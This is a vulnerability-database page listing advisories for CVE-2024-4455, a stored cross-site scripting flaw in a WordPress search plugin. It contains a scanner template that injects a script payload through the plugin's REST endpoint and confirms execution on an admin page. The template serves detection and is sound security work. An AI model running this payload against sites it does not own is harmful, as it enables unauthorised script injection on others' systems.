| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2024-4455 | 30 Dec 202521:02 | – | circl | |
| WordPress plugin YITH WooCommerce Ajax Search 安全漏洞 | 24 May 202400:00 | – | cnnvd | |
| CVE-2024-4455 | 24 May 202410:58 | – | cve | |
| CVE-2024-4455 YITH WooCommerce Ajax Search <= 2.4.0 - Unauthenticated Stored Cross-Site Scripting | 24 May 202410:58 | – | cvelist | |
| EUVD-2024-44074 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-4455 | 24 May 202411:15 | – | nvd | |
| WordPress YITH WooCommerce Ajax Search Plugin <= 2.4.0 is vulnerable to Cross Site Scripting (XSS) | 24 May 202400:00 | – | patchstack | |
| WordPress YITH WooCommerce Ajax Search plugin <= 2.4.0 - Unauthenticated Stored Cross-Site Scripting vulnerability | 24 May 202408:04 | – | patchstack | |
| PT-2024-31173 | 24 May 202400:00 | – | ptsecurity | |
| CVE-2024-4455 | 5 Feb 202500:05 | – | redhatcve |
id: CVE-2024-4455
info:
name: YITH WooCommerce Ajax Search <= 2.4.0 - Cross-Site Scripting
author: Shivam Kamboj
severity: high
description: |
The YITH WooCommerce Ajax Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'queryString' parameter in the REST API endpoint /ywcas/v1/register in versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping.
impact: |
Attackers can execute arbitrary scripts in users' browsers, potentially leading to session hijacking, defacement, or redirection.
remediation: |
Update YITH WooCommerce Ajax Search plugin to version 2.4.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-4455
- https://www.wordfence.com/threat-intel/vulnerabilities/id/cf0f5fd4-cd06-4d11-9f22-1f417b546afb
- https://patchstack.com/database/vulnerability/yith-woocommerce-ajax-search/wordpress-yith-woocommerce-ajax-search-plugin-2-4-0-unauthenticated-stored-cross-site-scripting-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-4455
epss-score: 0.0101
epss-percentile: 0.58886
cwe-id: CWE-79
metadata:
verified: true
max-request: 4
vendor: yithemes
product: yith-woocommerce-ajax-search
framework: wordpress
tags: cve,cve2024,wordpress,wp,wp-plugin,xss,yith,woocommerce,authenticated,vkev
flow: (http(1) && http(2)) || (http(3) && http(4))
http:
- raw:
- |
GET /wp-content/plugins/yith-woocommerce-ajax-search/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "compare_versions(version, '<= 2.4.0')"
- "contains(body, 'YITH WooCommerce Ajax Search')"
condition: and
internal: true
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
GET /?rest_route=/ywcas/v1/register&queryString=<script>alert(document.domain)</script>&totalResults=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: regex
part: body
regex:
- '"loggerID":\s*[0-9]+'
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- raw:
- |
GET /wp-admin/admin.php?page=yith_wcas_panel&tab=statistic&from&to&view_all=no_results HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "Query\"><script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022068691616a2528cdc6615488f1b5bf429e6f2d07f42bd8b594e2e81bbe6558eb7022100a04c54cec888053f06f96df560f3f0f913f4024d66548ce2f19f5b96e9bdbf3c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation